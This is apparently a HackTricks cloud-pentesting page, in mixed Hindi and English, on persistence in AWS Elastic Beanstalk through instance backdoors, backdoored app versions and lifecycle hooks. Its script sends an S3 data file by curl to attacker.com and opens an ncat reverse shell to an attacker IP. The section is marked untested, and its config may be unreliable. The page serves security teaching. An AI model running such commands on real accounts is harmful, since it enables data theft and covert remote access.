hacktricks-cloud/src/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence

AWS - Elastic Beanstalk Persistence

{{#include ../../../../banners/hacktricks-training.md}}

Elastic Beanstalk

अधिक जानकारी के लिए देखें:

{{#ref}} ../../aws-services/aws-elastic-beanstalk-enum.md {{#endref}}

Persistence in Instance

AWS account के अंदर persistence बनाए रखने के लिए, कुछ persistence mechanism could be introduced inside the instance (cron job, ssh key...) ताकि हमलावर उसे access करके IAM role credentials from the metadata service चुरा सके।

Backdoor in Version

एक हमलावर S3 repo के अंदर code में backdoor डाल सकता है ताकि यह हमेशा उसका backdoor और expected code दोनों execute करे।

New backdoored version

असल version के code को बदलने के बजाय, हमलावर application की एक नया backdoored version deploy कर सकता है।

Abusing Custom Resource Lifecycle Hooks

Note

TODO: Test

Elastic Beanstalk lifecycle hooks प्रदान करता है जो आपको instance provisioning और termination के दौरान custom scripts चलाने की अनुमति देते हैं। एक हमलावर lifecycle hook configure कर सकता है ताकि वह periodically एक script execute करे जो exfiltrates data या AWS account तक access बनाए रखे।

# Attacker creates a script that exfiltrates data and maintains access
echo '#!/bin/bash
aws s3 cp s3://sensitive-data-bucket/data.csv /tmp/data.csv
gzip /tmp/data.csv
curl -X POST --data-binary "@/tmp/data.csv.gz" https://attacker.com/exfil
ncat -e /bin/bash --ssl attacker-ip 12345' > stealthy_lifecycle_hook.sh

# Attacker uploads the script to an S3 bucket
aws s3 cp stealthy_lifecycle_hook.sh s3://attacker-bucket/stealthy_lifecycle_hook.sh

# Attacker modifies the Elastic Beanstalk environment configuration to include the custom lifecycle hook
echo 'Resources:
AWSEBAutoScalingGroup:
Metadata:
AWS::ElasticBeanstalk::Ext:
TriggerConfiguration:
triggers:
- name: stealthy-lifecycle-hook
events:
- "autoscaling:EC2_INSTANCE_LAUNCH"
- "autoscaling:EC2_INSTANCE_TERMINATE"
target:
ref: "AWS::ElasticBeanstalk::Environment"
arn:
Fn::GetAtt:
- "AWS::ElasticBeanstalk::Environment"
- "Arn"
stealthyLifecycleHook:
Type: AWS::AutoScaling::LifecycleHook
Properties:
AutoScalingGroupName:
Ref: AWSEBAutoScalingGroup
LifecycleTransition: autoscaling:EC2_INSTANCE_LAUNCHING
NotificationTargetARN:
Ref: stealthy-lifecycle-hook
RoleARN:
Fn::GetAtt:
- AWSEBAutoScalingGroup
- Arn' > stealthy_lifecycle_hook.yaml

# Attacker applies the new environment configuration
aws elasticbeanstalk update-environment --environment-name my-env --option-settings Namespace="aws:elasticbeanstalk:customoption",OptionName="CustomConfigurationTemplate",Value="stealthy_lifecycle_hook.yaml"

{{#include ../../../../banners/hacktricks-training.md}}